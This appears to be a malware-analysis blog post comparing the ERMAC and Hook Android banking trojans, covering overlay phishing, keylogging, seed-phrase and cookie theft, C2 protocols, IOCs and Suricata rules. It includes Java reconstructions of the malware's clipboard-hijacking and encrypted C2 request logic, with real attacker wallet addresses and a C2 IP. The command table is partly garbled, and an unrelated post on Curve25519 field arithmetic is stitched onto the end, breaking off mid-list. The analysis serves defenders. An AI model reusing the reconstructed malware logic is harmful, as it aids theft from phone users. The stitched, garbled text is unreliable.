
Full implementation of the class to extend the DeviceAdminReceiver in ERMAC. The first version of Hook contains the same implementation.

The onReceive() method is the entry point for broadcasts that are intercepted by the device admin receiver. In ERMAC and Hook 1 this only performs a check to see whether the received parameters are null and will throw an exception if they are.

DeviceAdminReceiver additions in latest version of Hook

In the latest edition of Hook, the class to extend the DeviceAdminReceiver does not just override the “onReceive” method. It also overrides the following methods:

Device Admin Method | Description
onDisableRequested() | Called when the user attempts to disable device admin. Gives the developer a chance to present a warning message to the user
onDisabled() | Called prior to device admin being disabled. Upon return, the app can no longer use the protected parts of the DevicePolicyManager API
onEnabled() | Called after device admin is first enabled. At this point, the app can use “DevicePolicyManager” to set the desired policies
onPasswordFailed() | Called when the user has entered an incorrect password for the device
onPasswordSucceeded() | Called after the user has entered a correct password for the device

When the victim attempts to disable device admin, a warning message is displayed that contains the text “Your mobile is die”.

Decompiled code that shows the implementation of the “onDisableRequested” method in the latest version of Hook.

The fingerprint scanner is disabled when an incorrect password is entered on the victim’s device, possibly to make it easier to break into the device later by forcing the victim to enter their PIN and capturing it.

Decompiled code that shows the implementation of the “onPasswordFailed” method in the latest version of Hook.

All keyguard (lock screen) features are enabled again once a correct password is entered on the victim’s device.

Decompiled code that shows the implementation of the “onPasswordSucceeded” method in the latest version of Hook.

Overlay attacks

Overlay attacks, also known as injections, are a popular tactic to steal credentials on Android devices. When an app has permission to draw overlays, it can display content on top of other apps that are running on the device. This is interesting for threat actors, because it allows them to display a phishing window over a legitimate app. When the victim enters their credentials in this window, the malware will capture them.

Both ERMAC and Hook use web injections to display a phishing window as soon as it detects a targeted app being launched on the victim’s device.

Decompiled code that shows partial implementation of overlay injections in ERMAC and Hook.

In the screenshot above, you can see how ERMAC and Hook set up a WebView component and load the HTML code to be displayed over the target app by calling webView5.loadDataWithBaseURL(null, s6, “text/html”, “UTF-8”, null) and this.setContentView() on the WebView object. The “s6” variable will contain the data to be loaded. The main functionality is the same for both variants, with Hook having some additional logging messages.

The importance of accessibility services

Accessibility Service abuse plays an important role when it comes to web injections and other automated features in ERMAC and Hook. Accessibility services are used to assist users with disabilities, or users who may temporarily be unable to fully interact with their Android device. For example: users that are driving might need additional or alternative interface feedback. Accessibility services run in the background and receive callbacks from the system when an AccessibilityEvent is fired. Apps with accessibility services enabled can have full visibility over UI events, both from the system and from 3rd party apps. They can receive notifications, they can get the package name, list UI elements, extract text, and more. While these services are meant to assist users, they can also be abused by malicious apps for activities such as: keylogging, automatically granting itself additional permissions, and monitoring foreground apps and overlaying them with phishing windows.

When ERMAC or Hook malware is first launched, it prompts the victim with a window that instructs them to enable accessibility services for the malicious app.

Instruction window to enable the accessibility service, which is shown upon first execution of ERMAC and Hook malware.

A warning message is displayed before enabling the accessibility service, which shows what actions the app will be able to perform when this is enabled.

Warning message that is displayed before enabling accessibility services.

With accessibility services enabled, ERMAC and Hook malware automatically grants itself additional permissions such as permission to draw overlays. The onAccessibilityEvent() method monitors the package names from received accessibility events, and the web injection related code will be executed when a target app is launched.

Targeted applications

When the infected device is ready to communicate with the C2 server, it sends a list of applications that are currently installed on the device. The C2 server then responds with the target apps that it has injections for. While dynamically analysing the latest version of Hook, we sent a custom HTTP request to the C2 server to make it believe that we have a large number of apps (700+) installed. For this, we used the list of package names that CSIRT KNF had shared in an analysis report of Hook [2].

Part of our manually crafted HTTP request that includes a list of “installed apps” for our infected device.

The server responded with the list of target apps that the malware can display phishing windows for. Most of the targeted apps in both Hook and ERMAC are related to banking.

Part of the C2 server response that contains the target apps for overlay injections.

Keylogging

Keylogging functionality can be found in the onAccessibilityEvent() method of both ERMAC and Hook. For every accessibility event type that is triggered on the infected device, a method is called that contains keylogger functionality. This method then checks what the accessibility event type was to label the log and extracts the text from it. Comparing the code implementation of keylogging in ERMAC to Hook, there are some slight differences in the accessibility event types that it checks for. But the main functionality of extracting text and sending it to the C2 with a certain label is the same.

Decompiled code snippet of keylogging in ERMAC and in Hook.

The ERMAC keylogger contains an extra check for accessibility event “TYPE_VIEW_SELECTED” (triggered when a user selects a view, such as tapping on a button). Accessibility services can extract information about a selected view, such as the text, and that is exactly what is happening here.

Hook specifically checks for two other accessibility events: the “TYPE_WINDOW_STATE_CHANGED” event (triggered when the state of an active window changes, for example when a new window is opened) or the “TYPE_WINDOW_CONTENT_CHANGED” event (triggered when the content within a window changes, like when the text within a window is updated).

It checks for these events in combination with the content change type “CONTENT_CHANGE_TYPE_TEXT” (indicating that the text of a UI element has changed). This tells us that the accessibility service is interested in changes to the textual content within a window, which is not surprising for a keylogger.
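The event filter described above can be approximated in plain Java. The constant values are those defined by Android’s AccessibilityEvent class; the decision logic is a hypothetical reconstruction for illustration, not decompiled code from the malware:

```java
public class HookKeylogFilterSketch {
    // Constant values as defined in android.view.accessibility.AccessibilityEvent.
    static final int TYPE_WINDOW_STATE_CHANGED = 0x20;
    static final int TYPE_WINDOW_CONTENT_CHANGED = 0x800;
    static final int CONTENT_CHANGE_TYPE_TEXT = 0x2;

    // Log only window events whose textual content changed.
    static boolean shouldLog(int eventType, int contentChangeTypes) {
        boolean windowEvent = eventType == TYPE_WINDOW_STATE_CHANGED
                || eventType == TYPE_WINDOW_CONTENT_CHANGED;
        boolean textChanged = (contentChangeTypes & CONTENT_CHANGE_TYPE_TEXT) != 0;
        return windowEvent && textChanged;
    }

    public static void main(String[] args) {
        System.out.println(shouldLog(TYPE_WINDOW_CONTENT_CHANGED, CONTENT_CHANGE_TYPE_TEXT)); // true
        System.out.println(shouldLog(TYPE_WINDOW_CONTENT_CHANGED, 0));                        // false
    }
}
```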

Stealing of crypto wallet seed phrases

Automatic stealing of recovery seeds from crypto wallets is one of the main features in ERMAC and Hook. This feature is actively developed, with support added for extra crypto wallets in the latest version of Hook.

For this feature, the accessibility service first checks if a crypto wallet app has been opened. Then, it will find UI elements by their ID (such as “com.wallet.crypto.trustapp:id/wallets_preference” and “com.wallet.crypto.trustapp:id/item_wallet_info_action”) and automatically clicks on these elements until it has navigated to the view that contains the recovery seed phrase. To the crypto wallet app, it looks as if the user is browsing to this phrase themselves.

Decompiled code that shows ERMAC and Hook searching for and clicking on UI elements in the Trust Wallet app.

Once the window with the recovery seed phrase is reached, it will extract the words from the recovery seed phrase and send them to the C2 server.

Decompiled code that shows the actions in ERMAC and Hook after obtaining the seed phrase.

The main implementation is the same in ERMAC and Hook for this feature, with Hook containing some extra logging messages and support for stealing seed phrases from additional cryptocurrency wallets.

Replacing copied crypto wallet addresses

Besides being able to automatically steal recovery seeds from opened crypto wallet apps, ERMAC and Hook can also detect whether a wallet address has been copied and replaces the clipboard with their own wallet address. It does this by monitoring for the “TYPE_VIEW_TEXT_CHANGED” event, and checking whether the text matches a regular expression for Bitcoin and Ethereum wallet addresses. If it matches, it will replace the clipboard text with the wallet address of the threat actor.

Decompiled code that shows how ERMAC and Hook replace copied crypto wallet addresses.
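A minimal reconstruction of this clipper check in plain Java might look like the following. The regular expressions are plausible stand-ins for common Bitcoin and Ethereum address formats (the exact patterns used by the malware are not reproduced here); the replacement addresses are the ones hardcoded in the analysed samples:

```java
import java.util.regex.Pattern;

public class ClipperSketch {
    // Hypothetical patterns matching common Bitcoin (legacy and bech32)
    // and Ethereum address formats; not the malware's exact regexes.
    static final Pattern BTC = Pattern.compile("^(bc1[a-z0-9]{25,59}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})$");
    static final Pattern ETH = Pattern.compile("^0x[a-fA-F0-9]{40}$");

    // Replacement addresses hardcoded in the analysed ERMAC/Hook samples.
    static final String ATTACKER_BTC = "bc1ql34xd8ynty3myfkwaf8jqeth0p4fxkxg673vlf";
    static final String ATTACKER_ETH = "0x3Cf7d4A8D30035Af83058371f0C6D4369B5024Ca";

    // Conceptually invoked when TYPE_VIEW_TEXT_CHANGED fires with the
    // current clipboard text; returns the text to place on the clipboard.
    static String maybeReplace(String clipboard) {
        if (BTC.matcher(clipboard).matches()) return ATTACKER_BTC;
        if (ETH.matcher(clipboard).matches()) return ATTACKER_ETH;
        return clipboard;
    }

    public static void main(String[] args) {
        System.out.println(maybeReplace("0x1111111111111111111111111111111111111111"));
        System.out.println(maybeReplace("not a wallet address"));
    }
}
```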

The wallet addresses that the actors use in both ERMAC and Hook are bc1ql34xd8ynty3myfkwaf8jqeth0p4fxkxg673vlf for Bitcoin and 0x3Cf7d4A8D30035Af83058371f0C6D4369B5024Ca for Ethereum. It’s worth mentioning that these wallet addresses are the same in all samples that we analysed. It appears that this feature has not been very successful for the actors, as they have received only two transactions at the time of writing.

Transactions received by the Ethereum wallet address of the actors.

Since the feature has been so unsuccessful, we assume that both received transactions were initiated by the actors themselves. The latest transaction was received from a verified Binance exchange wallet, and it’s unlikely that this comes from an infected device. The other transaction comes from a wallet that could be owned by the Hook actors.

Stealing of session cookies

The “cookie” command is exclusive to Hook and was only added in the latest version of this malware. This feature allows the malware operator to steal session cookies in order to take over the victim’s login session. To do so, a new WebViewClient is set up. When the victim has logged onto their account, the onPageFinished() method of the WebView will be called and it sends the stolen cookies to the C2 server.

Decompiled code that shows Google account session cookies will be sent to the C2 server.

All cookie stealing code is related to Google accounts. This is in line with DukeEugene’s announcement of new features that were posted about on April 1st, 2023. See #12 in the screenshot below.

DukeEugene announced new features in Hook, showing the main objective for the “cookie” command.

C2 communication protocol

HTTP in ERMAC

ERMAC is known to use the HTTP protocol for communicating with the C2 server, where data is encrypted using AES-256-CBC and then Base64 encoded. The bot sends HTTP POST requests to a randomly generated URL that ends with “.php/” (note that the IP of the C2 server remains the same).

Decompiled code that shows how request URLs are built in ERMAC.
Example HTTP POST request that was made during dynamic analysis of ERMAC.
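Based on this description, the request preparation can be sketched in plain Java. This is a minimal reconstruction for illustration only: the key, the static IV, and the endpoint length are assumptions (the real values come from the bot’s embedded configuration), but the overall scheme of AES-256-CBC encryption, Base64 encoding, and a random “/php/&lt;name&gt;.php/” endpoint follows the behaviour described above:

```java
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.nio.charset.StandardCharsets;
import java.security.SecureRandom;
import java.util.Base64;

public class ErmacC2Sketch {
    // Hypothetical 32-byte key and static IV; the real bot takes these
    // from its embedded configuration, which is not shown here.
    static final byte[] KEY = "0123456789abcdef0123456789abcdef".getBytes(StandardCharsets.UTF_8);
    static final byte[] IV = new byte[16];

    // AES-256-CBC encrypt, then Base64 encode, as described for ERMAC.
    static String encrypt(String plaintext) throws Exception {
        Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
        cipher.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(KEY, "AES"), new IvParameterSpec(IV));
        return Base64.getEncoder().encodeToString(
                cipher.doFinal(plaintext.getBytes(StandardCharsets.UTF_8)));
    }

    static String decrypt(String encoded) throws Exception {
        Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
        cipher.init(Cipher.DECRYPT_MODE, new SecretKeySpec(KEY, "AES"), new IvParameterSpec(IV));
        return new String(cipher.doFinal(Base64.getDecoder().decode(encoded)), StandardCharsets.UTF_8);
    }

    // Random endpoint of the form /php/<1-21 lowercase alphanumerics>.php/
    static String randomEndpoint(String c2) {
        String alphabet = "abcdefghijklmnopqrstuvwxyz0123456789";
        SecureRandom rng = new SecureRandom();
        StringBuilder name = new StringBuilder();
        int len = 1 + rng.nextInt(21);
        for (int i = 0; i < len; i++) {
            name.append(alphabet.charAt(rng.nextInt(alphabet.length())));
        }
        return c2 + "/php/" + name + ".php/";
    }

    public static void main(String[] args) throws Exception {
        System.out.println(randomEndpoint("http://5.42.199.91"));
        String wire = encrypt("{\"command\":\"checkAP\"}");
        System.out.println(wire);
        System.out.println(decrypt(wire));
    }
}
```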

WebSockets in Hook

The first editions of Hook introduced WebSocket communication using Socket.IO, and data is encrypted using the same mechanism as in ERMAC. The Socket.IO library is built on top of the WebSocket protocol and offers low-latency, bidirectional and event-based communication between a client and a server. Socket.IO provides additional guarantees such as fallback to the HTTP protocol and automatic reconnection [3].

Screenshot of WebSocket communication using Socket.IO in Hook.

The screenshot above shows that the login command was issued to the server, with the user ID of the infected device being sent as encrypted data. The “42” at the beginning of the message is standard in Socket.IO, where the “4” stands for the Engine.IO “message” packet type and the “2” for Socket.IO’s “message” packet type [3].
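The “42” framing can be illustrated with a small parser. This is purely illustrative of the Socket.IO wire format, not code taken from the malware:

```java
public class SocketIoFrameSketch {
    // Socket.IO event frames start with Engine.IO type '4' (message)
    // followed by Socket.IO type '2' (event); the JSON array containing
    // the event name and payload follows directly after.
    static String eventPayload(String frame) {
        if (frame.startsWith("42")) {
            return frame.substring(2);
        }
        return null; // not a Socket.IO event frame
    }

    public static void main(String[] args) {
        System.out.println(eventPayload("42[\"login\",\"<encrypted bot id>\"]"));
    }
}
```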

Mix and match – Protocols in latest versions of Hook

The latest Hook version that we’ve analysed contains the ERMAC HTTP protocol implementation, as well as the WebSocket implementation which already existed in previous editions of Hook. The Hook code snippet below shows that it uses the exact same code implementation as observed in ERMAC to build the URLs for HTTP requests.

Decompiled code that shows the latest version of Hook implemented the same logic for building URLs as ERMAC.

Both Hook and ERMAC use the “checkAP” command to check for commands sent by the C2 server. In the screenshot below, you can see that the malware operator sent the “killme” command to the infected device to uninstall Hook. This shows that the ERMAC HTTP protocol is actively used in the latest versions of Hook, together with the already existing WebSocket implementation.

The infected device is checking for commands sent by the C2 in Hook.

C2 servers

During our investigation into the technical differences between Hook and ERMAC, we have also collected C2 servers related to both families. From these servers, Russia is clearly the preferred country for hosting Hook and ERMAC C2s. We have identified a total of 23 Hook C2 servers that are hosted in Russia.

Other countries in which we have found ERMAC and Hook C2 servers hosted are:

  • The Netherlands
  • United Kingdom
  • United States
  • Germany
  • France
  • Korea
  • Japan
Popular countries for hosting Hook and ERMAC C2 servers.

The end?

On the 19th of April 2023, DukeEugene announced that they are closing the Hook project due to leaving for “special military operation”. The actor mentions that the coder of the Hook project, who goes by the nickname “RedDragon”, will continue to support their clients until their lease runs out.

DukeEugene mentions that they are closing the Hook project. Note that the first post was created on 19 April 2023 initially and edited a day later.

Two days prior to this announcement, the coder of Hook created a post stating that the source code of Hook is for sale at a price of $70,000. Nearly a month later, on May 11th, the coder asked if the thread could be closed as the source code was sold.

Hook’s coder announcing that the source code is for sale.

Observations

In the “Replacing copied crypto wallet addresses” section of this blog, we mentioned that the first received transaction comes from an Ethereum wallet address that could possibly be owned by the Hook actors. We noticed that this wallet received a transaction of roughly $25,000 the day after Hook was announced sold. This could be a coincidence, but the fact that this wallet was also the first to send (a small amount of) money to the Ethereum address that is hardcoded in Hook and ERMAC strengthens our suspicion.

Ethereum transaction that could be related to Hook.

We can’t verify whether the messages from DukeEugene and RedDragon are true. But if they are, we expect to see interesting new forks of Hook in the future.

In this blog we’ve debunked DukeEugene’s statement of Hook being fully developed from scratch. Additionally, in DukeEugene’s advertisement of HookBot we see a screenshot of the Hook panel that seemed to show similarities with ERMAC’s panel.

Conclusion

While the actors of Hook had announced that the malware was written from scratch, it is clear that the ERMAC source code was used as a base. All commands that are present in ERMAC also exist in Hook, and the code implementation of these commands is nearly identical in both malware families. Both Hook and ERMAC contain typical features to steal credentials which are common in Android malware, such as overlay attacks/injections and keylogging. Perhaps a more interesting feature that exists in both malware families is the automated stealing of recovery seeds from cryptocurrency wallets.

While Hook was not written completely from scratch, the authors have added interesting new features compared to ERMAC. With the added capability of being able to stream the victim’s screen and interacting with the UI, operators of Hook can gain complete control over infected devices and perform actions on the user’s behalf. Other interesting new features include the ability to take a photo of the victim using their front facing camera, stealing of cookies related to Google login sessions, and the added support for stealing recovery seeds from additional cryptocurrency wallets.

Besides these new features, significant changes were made in the protocol for communicating with the C2 server. The first versions of Hook introduced WebSocket communication using the Socket.IO library. The latest version of Hook added the HTTP protocol implementation that was already present in ERMAC and can use this next to WebSocket communication.

Hook had a relatively short run. It was first announced on the 12th of January 2023, and the closing of the project was announced on April 19th, 2023, with the actor claiming that he is leaving for “special military operation”. The coder of Hook has allegedly put the source code up for sale at a price of $70,000 and stated that it was sold on May 11th, 2023. If these announcements are true, it could mean that we will see interesting new forks of Hook in the future.

Indicators of Compromise

Analysed samples

Family | Package name | File hash (SHA-256)
Hook | com.lojibiwawajinu.guna | c5996e7a701f1154b48f962d01d457f9b7e95d9c3dd9bbd6a8e083865d563622
Hook | com.wawocizurovi.gadomi | d651219c28eec876f8961dcd0a0e365df110f09b7ae72eccb9de8c84129e23cb
ERMAC | com.cazojowiruje.tutado | e0bd84272ea93ea857cc74a745727085cf214eef0b5dcaf3a220d982c89cea84
ERMAC | com.jakedegivuwuwe.yewo | 6d8707da5cb71e23982bd29ac6a9f6069d6620f3bc7d1fd50b06e9897bc0ac50

C2 servers

Family | IP address
Hook | 5.42.199[.]22
Hook | 45.81.39[.]149
Hook | 45.93.201[.]92
Hook | 176.100.42[.]11
Hook | 91.215.85[.]223
Hook | 91.215.85[.]37
Hook | 91.215.85[.]23
Hook | 185.186.246[.]69
ERMAC | 5.42.199[.]91
ERMAC | 31.41.244[.]187
ERMAC | 45.93.201[.]92
ERMAC | 92.243.88[.]25
ERMAC | 176.113.115[.]66
ERMAC | 165.232.78[.]246
ERMAC | 51.15.150[.]5
ERMAC | 176.100.42[.]11
ERMAC | 91.215.85[.]22
ERMAC | 35.91.53[.]224
ERMAC | 193.106.191[.]148
ERMAC | 20.249.63[.]72
ERMAC | 62.204.41[.]98
ERMAC | 193.106.191[.]121
ERMAC | 193.106.191[.]116
ERMAC | 176.113.115[.]150
ERMAC | 91.213.50[.]62
ERMAC | 193.106.191[.]118
ERMAC | 5.42.199[.]3
ERMAC | 193.56.146[.]176
ERMAC | 62.204.41[.]94
ERMAC | 176.113.115[.]67
ERMAC | 108.61.166[.]245
ERMAC | 45.159.248[.]25
ERMAC | 20.108.0[.]165
ERMAC | 20.210.252[.]118
ERMAC | 68.178.206[.]43
ERMAC | 35.90.154[.]240

Network detection

The following Suricata rules were tested successfully against Hook network traffic:

# Detection for Hook/ERMAC mobile malware
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT – Mobile Malware – Possible Hook/ERMAC HTTP POST"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/php/"; depth:5; content:".php/"; isdataat:!1,relative; fast_pattern; pcre:"/^\/php\/[a-z0-9]{1,21}\.php\/$/U"; classtype:trojan-activity; priority:1; threshold:type limit,track by_src,count 1,seconds 3600; metadata:ids suricata; metadata:created_at 2023-06-02; metadata:updated_at 2023-06-07; sid:21004440; rev:2;)
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT – Mobile Malware – Possible Hook Websocket Packet Observed (login)"; content:"|81|"; depth:1; byte_test:1,&,0x80,1; luajit:hook.lua; classtype:trojan-activity; priority:1; threshold:type limit,track by_src,count 1,seconds 3600; metadata:ids suricata; metadata:created_at 2023-06-02; metadata:updated_at 2023-06-07; sid:21004441; rev:2;)

The second Suricata rule uses an additional Lua script, which can be found here
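To sanity-check the first rule’s URI pattern against the URL format described in the “HTTP in ERMAC” section, the pcre from that rule can be exercised directly:

```java
import java.util.regex.Pattern;

public class HookUriRuleCheck {
    // Same expression as the pcre in the first Suricata rule above.
    static final Pattern URI = Pattern.compile("^/php/[a-z0-9]{1,21}\\.php/$");

    public static void main(String[] args) {
        System.out.println(URI.matcher("/php/o5wjezsgjy.php/").matches()); // matches
        System.out.println(URI.matcher("/index.php").matches());          // does not
    }
}
```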

List of Commands

Family | Command | Description
ERMAC, Hook 1 & 2 | sendsms | Sends a specified SMS message to a specified number. If the SMS message is too large, it will send the message in multiple parts
ERMAC, Hook 1 & 2 | startussd | Executes a given USSD code on the victim’s device
ERMAC, Hook 1 & 2 | forwardcall | Sets up a call forwarder to forward all calls to the specified number in the payload
ERMAC, Hook 1 & 2 | push | Displays a push notification on the victim’s device, with a custom app name, title, and text to be edited by the malware operator
ERMAC, Hook 1 & 2 | getcontacts | Gets list of all contacts on the victim’s device
ERMAC, Hook 1 & 2 | getaccounts | Gets a list of the accounts on the victim’s device by their name and account type
ERMAC, Hook 1 & 2 | logaccounts | Gets a list of the accounts on the victim’s device by their name and account type
ERMAC, Hook 1 & 2 | getinstallapps | Gets a list of the installed apps on the victim’s device
ERMAC, Hook 1 & 2 | getsms | Steals all SMS messages from the victim’s device
ERMAC, Hook 1 & 2 | startinject | Performs a phishing overlay attack against the given application
ERMAC, Hook 1 & 2 | openurl | Opens the specified URL
ERMAC, Hook 1 & 2 | startauthenticator2 | Starts the Google Authenticator app
ERMAC, Hook 1 & 2 | trust | Launches the Trust Wallet app
ERMAC, Hook 1 & 2 | mycelium | Launches the Mycelium Wallet app
ERMAC, Hook 1 & 2 | piuk | Launches the Blockchain Wallet app
ERMAC, Hook 1 & 2 | samourai | Launches the Samourai Wallet app
ERMAC, Hook 1 & 2 | bitcoincom | Launches the Bitcoin Wallet app
ERMAC, Hook 1 & 2 | toshi | Launches the Coinbase Wallet app
ERMAC, Hook 1 & 2 | metamask | Launches the Metamask Wallet app
ERMAC, Hook 1 & 2 | sendsmsall | Sends a specified SMS message to all contacts on the victim’s device. If the SMS message is too large, it will send the message in multiple parts
ERMAC, Hook 1 & 2 | startapp | Starts the app specified in the payload
ERMAC, Hook 1 & 2 | clearcash | Sets the “autoClickCache” shared preference key to value 1, and launches the “Application Details” setting for the specified app (probably to clear the cache)
ERMAC, Hook 1 & 2 | clearcache | Sets the “autoClickCache” shared preference key to value 1, and launches the “Application Details” setting for the specified app (probably to clear the cache)
ERMAC, Hook 1 & 2 | calling | Calls the number specified in the “number” payload, tries to lock the device and attempts to hide and mute the application
ERMAC, Hook 1 & 2 | deleteapplication | Uninstalls a specified application
ERMAC, Hook 1 & 2 | startadmin | Sets the “start_admin” shared preference key to value 1, which is probably used as a check before attempting to gain Device Admin privileges (as seen in Hook samples)
ERMAC, Hook 1 & 2 | killme | Stores the package name of the malicious app in the “killApplication” shared preference key, in order to uninstall it. This is the kill switch for the malware
ERMAC, Hook 1 & 2 | updateinjectandlistapps | Gets a list of the currently installed apps on the victim’s device, and downloads the injection target lists
ERMAC, Hook 1 & 2 | gmailtitles | Sets the “gm_list” shared preference key to the value “start” and starts the Gmail app
ERMAC, Hook 1 & 2 | getgmailmessage | Sets the “gm_mes_command” shared preference key to the value “start” and starts the Gmail app
Hook 1 & 2 | start_vnc | Starts capturing the victim’s screen constantly (streaming)
Hook 1 & 2 | stop_vnc | Stops capturing the victim’s screen constantly (streaming)
Hook 1 & 2 | takescreenshot | Takes a screenshot of the victim’s device (note that it starts the same activity as for the “start_vnc” command, but it does so without the extra “streamScreen” set to true to only take one screenshot)
Hook 1 & 2 | swipe | Performs a swipe gesture with the specified 4 coordinates
Hook 1 & 2 | swipeup | Performs a swipe up gesture
Hook 1 & 2 | swipedown | Performs a swipe down gesture
Hook 1 & 2 | swipeleft | Performs a swipe left gesture
Hook 1 & 2 | swiperight | Performs a swipe right gesture
Hook 1 & 2 | scrollup | Performs a scroll up gesture
Hook 1 & 2 | scrolldown | Performs a scroll down gesture
Hook 1 & 2 | onkeyevent | Performs a certain action depending on the specified key payload (POWER DIALOG, BACK, HOME, LOCK SCREEN, or RECENTS)
Hook 1 & 2 | onpointerevent | Sets X and Y coordinates and performs an action based on the payload text provided. Three options: “down”, “continue”, and “up”. It looks like these payload texts work together, as in: it first sets the starting coordinates where it should press down, then it sets the coordinates where it should draw a line to from the previous starting coordinates, then it performs a stroke gesture using this information
Hook 1 2longpressDispatches a long press gesture at the specified coordinates
Hook 1 2tapDispatches a tap gesture at the specified coordinates
Hook 1 2clickatClicks at a specific UI element
Hook 1 2clickattextClicks on the UI element with a specific text value
Hook 1 2clickatcontaintextClicks on the UI element that contains the payload text
Hook 1 2cuttextReplaces the clipboard on the victim’s device with the payload text
Hook 1 2settextSets a specified UI element to the specified text
Hook 1 2openappOpens the specified app
Hook 1 2openwhatsappSends a message through Whatsapp to the specified number
Hook 1 2addcontactAdds a new contact to the victim’s device
Hook 1 2getcallhistoryGets a log of the calls that the victim made
Hook 1 2makecallCalls the number specified in the payload
Hook 1 2forwardsmsSets up an SMS forwarder to forward the received and sent SMS messages from the victim device to the specified number in the payload
Hook 1 2getlocationGets the geographic coordinates (latitude and longitude) of the victim
Hook 1 2getimagesGets list of all images on the victim’s device
Hook 1 2downloadimageDownloads an image from the victim’s device
Hook 1 2fmmanagerEither lists the files at a specified path (additional parameter “ls”), or downloads a file from the specified path (additional parameter “dl”)
Hook 2send_sms_manySends an SMS message to multiple phone numbers
Hook 2addwaitviewDisplays a “wait / loading” view with a progress bar, custom background colour, text colour, and text to be displayed
Hook 2removewaitviewRemoves a “RelativeLayout” view group, which displays child views together in relative positions. More specifically: this command removes the “wait / loading” view that is displayed on the victim’s device as a result of the “addwaitview” command
Hook 2addviewAdds a new view with a black background that covers the entire screen
Hook 2removeviewRemoves a “LinearLayout” view group, which arranges other views either horizontally in a single column or vertically in a single row. More specifically: this command removes the view with the black background that was added by the “addview” command
Hook 2cookieSteals session cookies (targets victim’s Google account)
Hook 2safepalStarts the Safepal Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service)
Hook 2exodusStarts the Exodus Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service)
Hook 2takephotoTakes a photo of the victim using the front facing camera

References


[1] – https://www.threatfabric.com/blogs/hook-a-new-ermac-fork-with-rat-capabilities
[2] – https://cebrf.knf.gov.pl/komunikaty/artykuly-csirt-knf/362-ostrzezenia/858-hookbot-a-new-mobile-malware
[3] – https://socket.io/docs/v4/

On Multiplications with Unsaturated Limbs

18 September 2023 at 17:04

This post is about a rather technical coding strategy choice that arises when implementing cryptographic algorithms on some elliptic curves, namely how to represent elements of the base field. We will be discussing Curve25519 implementations, in particular as part of Ed25519 signatures, as specified in RFC 8032. The most widely used Rust implementation of these operations is the curve25519-dalek library. My own research library is crrl, also written in plain Rust (no assembly); it is meant for research purposes, but I write it using all best practices for production-level implementations, e.g. it is fully constant-time and offers an API amenable to integration into various applications.

The following table measures performance of Ed25519 signature generation and verification with these libraries, using various backend implementations for operations in the base field (integers modulo 2^255 - 19), on two test platforms (64-bit x86, and 64-bit RISC-V):

Library            Backend   x86 sign   x86 verify   RISC-V sign   RISC-V verify
crrl               m64          49130       108559        202021          412764
crrl               m51          70149       148653        158928          304902
curve25519-dalek   simd         59553       116243           n/a             n/a
curve25519-dalek   serial       59599       169621        180142          449980
curve25519-dalek   fiat         70552       198289        187220          429755

Ed25519 performance (in clock cycles), on x86 (Intel “Coffee Lake”) and RISC-V (SiFive U74).

Test platforms are the following:

  • x86: an Intel Core i5-8259U CPU, running at 2.30 GHz (TurboBoost is disabled). This uses “Coffee Lake” cores (one of the late variants of the “Skylake” line). Operating system is Linux (Ubuntu 22.04), in 64-bit mode.
  • RISC-V: a StarFive VisionFive2 board with a StarFive JH7110 CPU, running at 1 GHz. The CPU contains four SiFive U74 cores and implements the I, M, C, Zba and Zbb architecture extensions (and some others which are not relevant here). Operating system is again Linux (Ubuntu 23.04), in 64-bit mode.

In both cases, the current Rust “stable” version is used (1.72.0, from 2023-08-23), and compilation uses the environment variable RUSTFLAGS=”-C target-cpu=native” to allow the compiler to use all opcodes supported by the current platform. The computation is performed over a single core, with measurements averaged over randomized inputs. The CPU cycle counter is used. Figures above are listed with many digits, but in practice there is a bit of natural variance due to varying inputs (signature verification is not constant-time, since it uses only public data) and, more generally, because of the effect of various operations also occurring within the CPU (e.g. management mode, cache usage from other cores, interruptions from hardware…), so that the measured values should be taken with a grain of salt (roughly speaking, differences below about 3% are not significant).

crrl and curve25519-dalek differ a bit in how they use internal tables to speed up computations; in general, crrl tables are smaller, and crrl performs fewer point additions but more point doublings. For signature verification, crrl implements the Antipa et al optimization with Lagrange’s algorithm for lattice basis reduction, but curve25519-dalek does not. The measurements above show that crrl’s strategy works (i.e. it is a tad faster than curve25519-dalek) (note: not listed above is the fact that curve25519-dalek supports batch signature verification with a substantially lower per-signature cost; crrl does not implement that feature yet). The point of this post is not to boast about how crrl is faster; its good performance should be taken as an indication that it is decently optimized and thus a correct illustration of the effect of its implementation strategy choices. Indeed, the interesting part is how the different backends compare to each other, on the two tested architectures.

curve25519-dalek has three backends:

  • serial: Field elements are split over 5 limbs of 51 bits; that is, value x is split into five values x0 to x4, such that x = x0 + 2^51*x1 + 2^102*x2 + 2^153*x3 + 2^204*x4. Importantly, limb values are held in 64-bit words and may somewhat exceed 2^51 (within some limits, to avoid overflows during computations). The representation is redundant, in that a given field element x accepts many different representations; a normalization step is applied when necessary (e.g. when serializing curve points into bytes).
  • fiat: The fiat backend is a wrapper around the fiat-crypto library, which uses basically the same implementation strategy as the serial backend, but through automatic code generation that includes a correctness proof. In other words, the fiat backend is guaranteed through the magic of mathematics to always return the correct result, while in all other library backends listed here, the guarantee is “only” through the non-magic of code auditors (including myself) poring over the code for hours in search of issues, and not finding any (in practice all the code referenced here is believed correct).
  • simd: AVX2 opcodes are used to perform arithmetic operations on four field elements in parallel; each element is split over ten limbs of 25 and 26 bits each. curve25519-dalek selects that backend whenever possible, i.e. on x86 systems which have AVX2 (such as an Intel “Coffee Lake”), but of course it is not available on RISC-V.

crrl has two backends:

  • m51: A “51-bit limbs” backend similar to curve25519-dalek’s “serial”, though with somewhat different choices for the actual operations (this is detailed later on).
  • m64: Field elements are split over four 64-bit limbs, held in 64-bit types. By nature, such limbs cannot exceed their 64-bit range. The representation is still slightly redundant in that overall values may use the complete 256-bit range, so that each field element has two or three possible representations (a final reduction modulo 2^255 - 19 is performed before serializing).

